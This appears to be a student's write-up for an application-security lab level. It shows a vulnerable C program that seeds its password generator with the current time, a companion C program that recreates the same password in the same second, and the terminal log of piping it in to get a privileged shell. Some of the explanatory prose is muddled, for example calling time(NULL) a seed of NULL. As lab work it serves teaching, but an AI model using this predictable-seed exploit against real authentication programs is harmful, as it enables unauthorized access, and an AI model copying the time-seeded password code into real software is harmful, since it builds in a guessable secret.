See the assignment's PDF available on BrightSpace for task descriptions and submission requirements.
Level 4
1) The vulnerability in this program is that it uses srand(time(NULL)); with a predefined seed namely NULL. Now what this means is that if we can make it so So that we run this program twice at the same time. The seed will be exactly the same. this function uses the current time in seconds that passed from the time that the atomic clock started. Which is I believe the first of January 1970. So, if we can run these files, two files at the same time, they will have the exact same seed and since the generate password function depends on the seed because it uses the rand function, we will get the password and we can read it in one file and enter it than the other.
2) The way that we did it is by creating a new C program which basically has the same function to generate the password and has the same srand(NULL) and basically does everything the same but it after generating the the password. what our code doe sthen does is it prints our username and then enter, and it prints the generated password and enter. What we will do then is we will run the script and we will run it and pipe the outputs into the real level4 binary and what will happen is that since this program will definitely run within the same second. What will happen is it will print the username, press enter in the other program and then it will print the generated password and since both files ran in the same second they generated the same password and thus it will enter the right password. Then in the code what will happen is it will open a a shell session which has the appropriate privileges so we can run the escalate command.
my script:
students177@appsec2026:~$ nano lv4_crack.c students177@appsec2026:~$ cat lv4_crack.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
void generate_passwd(char* buf, size_t buf_size) {
for(size_t i = 0; i < buf_size-1; ++i) {
int val = rand() % 62;
if(val < 26)
buf[i] = 'A' + val;
else if(val < 52)
buf[i] = 'a' + (val - 26);
else
buf[i] = '0' + (val - 52);
}
buf[buf_size-1] = '\0';
}
int main() {
srand(time(NULL));
char passwd_generated[32];
generate_passwd(passwd_generated, 32);
printf("aryan\n");
printf("%s\n", passwd_generated);
return 0;
}
students177@appsec2026:~$ gcc lv4_crack.c -o lv4_crack students177@appsec2026:~$ (./lv4_crack; cat) | /levels/level4/level4 Enter username: Enter password: Entered 2YNrZofdR5iB8a4vpFII78WmYDx0xNbfor user aryan Password was: 2YNrZofdR5iB8a4vpFII78WmYDx0xNb Access granted escalate Permanently added students177 to group level4, congratulations! /!\ Remember to log in again to reload your groups. /!\
code:
students177@appsec2026:/levels/level4$ cat level4.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <unistd.h>
void generate_passwd(char* buf, size_t buf_size) {
for(size_t i = 0; i < buf_size-1; ++i) {
int val = rand() % 62;
if(val < 26)
buf[i] = 'A' + val;
else if(val < 52)
buf[i] = 'a' + (val - 26);
else
buf[i] = '0' + (val - 52);
}
buf[buf_size-1] = '\0';
}
int main() {
srand(time(NULL));
char passwd_generated[32];
generate_passwd(passwd_generated, 32);
char username[32];
memset(username, 0, sizeof(username));
printf("Enter username: ");
fgets(username, sizeof(username), stdin);
char passwd_input[32];
memset(passwd_input, 0, sizeof(passwd_input));
printf("Enter password: ");
fgets(passwd_input, sizeof(passwd_input), stdin);
printf("Entered %sfor user %s\n", passwd_input, username);
printf("Password was: %s\n", passwd_generated);
if(strcmp(passwd_generated, passwd_input) == 0) {
printf("Access granted\n");
execl("/bin/sh", "/bin/sh", (char*)NULL);
} else {
printf("Access denied\n");
}
return 0;
}